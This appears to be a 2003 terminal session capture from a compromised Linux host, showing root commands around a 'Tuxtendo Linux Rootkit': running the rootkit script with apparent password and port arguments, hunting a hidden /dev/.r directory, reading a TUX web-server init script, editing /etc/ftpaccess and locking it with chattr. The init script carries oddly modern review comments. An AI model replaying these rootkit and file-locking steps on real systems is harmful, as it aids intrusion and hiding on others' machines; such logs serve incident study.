root     13221  0.0  0.4  1344   304  p2 T   11:15   0:00 ln -s /dev/null .bash
root     13222  0.0  0.0     0     0  p2 Z   11:15   0:00 [ln ]
root     13249  0.0  0.5  1644   344  p2 T   11:16   0:00 awk -F    {print $2} 
root     13253  0.0  0.0     0     0  p2 Z   11:16   0:00 [awk ]
root     13266  0.0  1.1  1476   700  p2 R   11:20   0:00 ps -aux 
root     13267  0.0  0.4  1364   308  p2 R   11:20   0:00 ps -aux 
root     13268  0.0  0.4  1364   308  p2 R   11:20   0:00 ps -aux 
rpcuser    591  0.0  0.4  1568   264  ?  S  Feb 21   0:00 rpc.statd 
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# killall -9 awk mv cp rm
cp: no process killed
rm: no process killed
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# w
 11:20am  up 3 days, 20:59,  1 user,  load average: 1.86, 1.64, 0.89
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
mssql    pts/2    astound-64-85-22 11:10am  1.00s  0.05s  0.03s  -bash 
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# ls -al
total 2604
drwxr-xr-x   2 933      cheerie      4096 Feb 25 10:17 .
drwxr-x---   6 root     root         4096 Feb 25 11:16 ..
-rw-------   1 933      cheerie    502884 Dec  5  2001 bin.tgz
-rw-------   1 933      cheerie      1096 Feb 25 10:13 cfg.tgz
-rw-------   1 933      cheerie     16213 Dec  5  2001 lib.tgz
-rw-------   1 933      cheerie    461768 Feb 25 10:16 sshd.tgz
-rw-------   1 933      cheerie   1644819 Dec  5  2001 tools.tgz
-rwx------   1 933      cheerie      9487 Feb 25 09:33 tuxkit
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# ./tuxkit        ls -al
total 2604
drwxr-xr-x   2 933      cheerie      4096 Feb 25 10:17 .
drwxr-x---   6 root     root         4096 Feb 25 11:16 ..
-rw-------   1 933      cheerie    502884 Dec  5  2001 bin.tgz
-rw-------   1 933      cheerie      1096 Feb 25 10:13 cfg.tgz
-rw-------   1 933      cheerie     16213 Dec  5  2001 lib.tgz
-rw-------   1 933      cheerie    461768 Feb 25 10:16 sshd.tgz
-rw-------   1 933      cheerie   1644819 Dec  5  2001 tools.tgz
-rwx------   1 933      cheerie      9487 Feb 25 09:33 tuxkit
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# ./tuxkit k3wlm3 3432 8008

]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# sh tuxkit k3wlm3 3432 8008

]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# pico tuxkit
pico: error while loading shared libraries: libncurses.so.4: cannot load shared object file: No such file or directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# vi tuxkit
"tuxkit" 373L, 9487C
#!/bin/sh
# Tuxtendo Linux Rootkit v1.0 By Argv[]

# Your e-mail address
EMAIL="[--delete--]@yahoo.com"

# You don't need to edit anything below this

BLK='\033[1;30m'
RED='\033[1;31m'
GRN='\033[1;32m'
YEL='\033[1;33m'
BLU='\033[1;34m'
MAG='\033[1;35m'
CYN='\033[1;36m'
WHI='\033[1;37m'
DRED='\033[0;31m'
DGRN='\033[0;32m'
DYEL='\033[0;33m'
DBLU='\033[0;34m'
DMAG='\033[0;35m'
DCYN='\033[0;36m'
DWHI='\033[0;37m'
!/bin/sh
:q!
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# xfs
bash: xfs: command not found
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# locate xfs
locate: warning: database `/usr/local/var/locatedb' is more than 8 days old
locate: /usr/local/var/locatedb: Is a directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# whereis xfs
xfs: /usr/X11R6/bin/xfs /usr/bin/X11/xfs
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]#  /usr/X11R6/bin/xfs
FontCacheInitialize: hi=1048576, lo=786432, bal=70
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# /usr/bin/X11/xfs
FontCacheInitialize: hi=1048576, lo=786432, bal=70
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# /usr/bin/xsf  
bash: /usr/bin/xsf: No such file or directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# /usr/bin/xchk
bash: /usr/bin/xchk: No such file or directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# whereis xsf
xsf:
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# cd /dev/.tux
bash: cd: /dev/.tux: No such file or directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# whereis tux
tux: /usr/sbin/tux /usr/include/tux.h /usr/share/man/man2/tux.2.gz
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# .//usr/sbin/tux
bash: .//usr/sbin/tux: No such file or directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# /usr/sbin/tux
Could not find user name "nobody"
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# cd /dev/tux
bash: cd: /dev/tux: No such file or directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# cd /dev
]0;root@pc88: /dev[root@pc88 /dev]# find | grep tux
./.r/etc/rc.d/init.d/tux
]0;root@pc88: /dev[root@pc88 /dev]# cd /dev/tux
bash: cd: /dev/tux: No such file or directory
]0;root@pc88: /dev[root@pc88 /dev]# cd ./.r/etc/rc.d/init.d/tux
bash: cd: ./.r/etc/rc.d/init.d/tux: Not a directory
]0;root@pc88: /dev[root@pc88 /dev]# cd .r/etc/rc.d/init.d/tux
bash: cd: .r/etc/rc.d/init.d/tux: Not a directory
]0;root@pc88: /dev[root@pc88 /dev]# cat .r/etc/rc.d/init.d/tux
#! /bin/sh
#
# tux        This starts and stops the TUX kernel-based http server.
#
# chkconfig: - 50 50
# description: The TUX threaded kernel-based http server
#
# processname: /usr/sbin/tux
# config: /etc/sysconfig/tux
# config: /etc/sysctl.conf


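# Source function library.
. /etc/rc.d/init.d/functions

# Set defaults: one thread per "processor" entry in /proc/cpuinfo.
NRCPUS=$(grep -c '^processor[[:space:]]*:' /proc/cpuinfo)
TUXTHREADS=$NRCPUS
EXTRAOPTS=

# Get config.
# Both files are sourced, so every line in them runs as shell code with this
# script's privileges, and they can override the defaults set above.
. /etc/sysconfig/network
. /etc/sysconfig/tux

# Check that networking is up.
# Quoted so an unset or empty NETWORKING is an ordinary "not equal" instead
# of a test(1) syntax error.
if [ "${NETWORKING}" = "no" ]
then
	exit 0
fi

# DOCROOT should have precisely one trailing /

[ -z "$DOCROOT" ] && {
	echo "Must specify a docroot in /etc/sysconfig/tux" 1>&2
	exit 1
}
# Quoted and passed through printf so whitespace or glob characters in the
# configured path are not split or expanded before sed normalises the slash.
DOCROOT=$(printf '%s\n' "$DOCROOT" | sed 's:/*$:/:g')

# Optional settings become extra command-line flags.  EXTRAOPTS is a flat
# string that is word-split where tux is launched, so these values must not
# contain whitespace.
[ -n "$MODULEPATH" ] && {
	EXTRAOPTS="$EXTRAOPTS -m $MODULEPATH"
}

[ -n "$DAEMON_UID" ] && EXTRAOPTS="$EXTRAOPTS -u $DAEMON_UID"
[ -n "$DAEMON_GID" ] && EXTRAOPTS="$EXTRAOPTS -g $DAEMON_GID"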

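# isname VALUE
# Returns 0 when VALUE contains at least one character that is not a decimal
# digit (so it has to be resolved as a user/group name), and 1 for an empty
# or all-digit VALUE.
# A case pattern replaces the echo | tr pipeline so that values such as "-n"
# or "*" are tested literally instead of being consumed by echo or expanded
# as a glob.
isname(){
	case "$1" in
		*[!0-9]*) return 0 ;;
		*) return 1 ;;
	esac
}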

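# CGI processes default to the "nobody" account.  Names are converted to
# numeric ids here; start() later writes CGI_UID/CGI_GID under
# /proc/sys/net/tux.
# NOTE(review): if a lookup fails (unknown user or group) the variable is left
# empty and the script carries on -- confirm that is acceptable.
[ -z "$CGI_UID" ] && CGI_UID=nobody
isname "$CGI_UID" && CGI_UID=$(id -u "$CGI_UID")
[ -z "$CGI_GID" ] && CGI_GID=nobody
# The group name is handed to awk with -v rather than spliced into the awk
# program text, so quotes or other metacharacters in it are compared as data.
# Appending "" forces a string comparison, as the original literal did.
isname "$CGI_GID" && CGI_GID=$(awk -F: -v grp="$CGI_GID" '$1 == (grp "") { print $3 }' /etc/group)

[ -z "$CGIROOT" ] && CGIROOT=$DOCROOT
[ -z "$MAX_KEEPALIVE_TIMEOUT" ] && MAX_KEEPALIVE_TIMEOUT=30

# Nothing to manage if the tux binary is not installed.
[ -f /usr/sbin/tux ] || exit 1
RETVAL=0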

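# Start the server: try to load the module, write the configured values under
# /proc/sys/net/tux, then launch /usr/sbin/tux through the daemon helper.
# Globals read: TUXTHREADS DOCROOT CGI_UID CGI_GID CGIROOT
#               MAX_KEEPALIVE_TIMEOUT EXTRAOPTS TUXMODULES
# Globals set:  RETVAL (exit status of the daemon call)
start(){
    echo -n "Starting tux: "
    # TUX ships as a module but many installations will build
    # it into the kernel for maximum performance.  Try to modprobe
    # but failures are fine.
    modprobe tux >/dev/null 2>&1
    # Quoted so whitespace or glob characters in a configured value are
    # written exactly as set instead of being split or expanded.
    echo "$TUXTHREADS" > /proc/sys/net/tux/threads
    echo "$DOCROOT" > /proc/sys/net/tux/documentroot
    echo "$CGI_UID" > /proc/sys/net/tux/cgi_uid
    echo "$CGI_GID" > /proc/sys/net/tux/cgi_gid
    echo "$CGIROOT" > /proc/sys/net/tux/cgiroot
    echo "$MAX_KEEPALIVE_TIMEOUT" > /proc/sys/net/tux/keepalive_timeout
    # EXTRAOPTS is built as a space-separated flag string and must split into
    # separate arguments, so it stays unquoted; TUXMODULES is presumably a
    # list of the same kind (not set in this script).
    daemon /usr/sbin/tux -d -t "$TUXTHREADS" -r "$DOCROOT" $EXTRAOPTS $TUXMODULES
    RETVAL=$?
    echo
    # Record the service as running only when the launch succeeded;
    # condrestart decides whether to restart based on this lock file.
    if [ "$RETVAL" -eq 0 ]; then
        touch /var/lock/subsys/tux
    fi
}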

# Ask the tux binary to stop the server, keep its exit status in RETVAL, and
# remove the subsystem lock file whatever the outcome was.
stop(){
    printf '%s' "Stopping tux: "
    if /usr/sbin/tux --stop; then
        RETVAL=0
    else
        RETVAL=$?
    fi
    printf '\n'
    rm -f /var/lock/subsys/tux
}

# Bounce the server: a full stop followed by a fresh start.
restart(){
    stop; start
}

# Restart only when the subsystem lock file exists; otherwise do nothing and
# return 1.
condrestart(){
    if [ ! -e /var/lock/subsys/tux ]; then
        return 1
    fi
    restart
}


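# See how we were called.
# Each action sets RETVAL, which becomes the script's exit status.
case "$1" in
    start)
	start
	;;
    stop)
	stop
	;;
    status)
	# status is not defined in this script (presumably it comes from the
	# sourced function library).  Keep its result so the exit code
	# reflects what it reported instead of always being 0.
	status /usr/sbin/tux
	RETVAL=$?
	;;
    restart|reload)
	restart
	;;
    condrestart)
	condrestart
	;;
    *)
	echo "Usage: tux {start|stop|status|restart|condrestart|reload}"
	RETVAL=1
	;;
esac

exit $RETVAL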
]0;root@pc88: /dev[root@pc88 /dev]# clear
]0;root@pc88: /dev[root@pc88 /dev]# whereis tools
tools:
]0;root@pc88: /dev[root@pc88 /dev]# vi /etc/ftpaccess
[?25l[?1048h[?1047h[?1h=[?25h[?25h"/etc/ftpaccess" 69L, 1748C# This file controls the behavior of the wu-ftpd
# ftp server.
#
# If you're looking for a graphical frontend to
# editing it, try kwuftpd from the kdeadmin
# package.

# Don't allow system accounts to log in over ftp
deny-uid %-99 %65534-
deny-gid %-99 %65534-
allow-uid ftp
allow-gid ftp

# The ftpchroot group doesn't exist by default, this
# entry is just supplied as an example.
# To chroot a user, modify the line below or create
# the ftpchroot group and add the user to it.
#
# You will need to setup the required applications
# and libraries in the root directory (set using
# guest-root).
#
# Look at the anonftp package for the files you'll need.[?25h





















[?25l
guestgroup ftpchroot[?25h[?25l
[?25h[?25l
# User classes...[?25h[?25l
class   all   real,guest,anonymous  *[?25h[?25l
[?25h[?25l
# Set this to your email address[?25h[?25l
:[?25h/anonymous[?25lreadme  README*    login
readme  README*    cwd=*

# Messages displayed to the user
message /welcome.msg            login
message .message                cwd=*

# Allow on-the-fly compression and tarring
compress        yes             all
tar             yes             all

# Prevent anonymous users (and partially guest users)
# from executing dangerous commands
chmod           no              guest,anonymous
delete          no              anonymous
overwrite       no              anonymous
rename          no              anonymous

# Turn on logging to /var/log/xferlog
log transfers anonymous,guest,real inbound,outbound

# If /etc/shutmsg exists, don't allow logins
# see ftpshut man page[?25h

[?25l# changing to a different directory[?25h[?25l# Notify the users of README files at login and when[?25h[?25l[?25h[?25lloginfails 5[?25h[?25l# Allow 5 mistyped passwords[?25h[?25l[?25h[?25lemail root@localhost[?25h[?25l# Set this to your email address[?25h[?25l[?25h[?25lclass   all   real,guest,anonymous  *[?25h[?25l# User classes...[?25h[?25l[?25h[?25lguestgroup ftpchroot[?25h[?25l# Look at the anonftp package for the files you'll need.[?25h[?25l#[?25h[?25l# guest-root).[?25h[?25l# and libraries in the root directory (set using[?25h[?25l# You will need to setup the required applications[?25h[?25l#[?25h[?25l# the ftpchroot group and add the user to it.[?25h[?25l# To chroot a user, modify the line below or create[?25h[?25l# entry is just supplied as an example.[?25h[?25l# The ftpchroot group doesn't exist by default, this[?25h[?25l[?25h[?25lallow-gid ftp[?25h[?25lallow-uid ftp[?25h[?25ldeny-gid %-99 %65534-[?25h[?25ldeny-uid %-99 %65534-[?25h[?25l# Don't allow system accounts to log in over ftp[?25h[?25l[?25h[?25l# package.[?25h[?25l# editing it, try kwuftpd from the kdeadmin[?25h[?25l# If you're looking for a graphical frontend to[?25h[?25l#[?25h










[?25l# ftp server.[?25h[?25l# This file controls the behavior of the wu-ftpd[?25h





















[?25l
guestgroup ftpchroot[?25h[?25l
[?25h[?25l
# User classes...[?25h[?25l
class   all   real,guest,anonymous  *[?25h[?25l
[?25hclass   all   real,guest,an[?25lnonymous  *[?25h[?25lonymous  *[?25h[?25lnymous  *[?25h[?25lymous  *[?25h[?25lmous  *[?25h[?25lous  *[?25h[?25lus  *[?25h[?25ls  *[?25h[?25l  *[?25h[?25l *[?25h[?25l

:[?25hwq[?25l"/etc/ftpaccess" 69L, 1738C written[?1l>[?25h[?1047l[?1048l]0;root@pc88: /dev[root@pc88 /dev]# chattr +iau /etc/ftpaccess
]0;root@pc88: /dev[root@pc88 /dev]# 
Back at local tty.
end at Tue Feb 25 11:41:54 HKT 2003
----------------------------------


Tue Feb 25 12:41:50 HKT 2003
================================

Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.

Back at local tty.
end at Tue Feb 25 12:42:09 HKT 2003
----------------------------------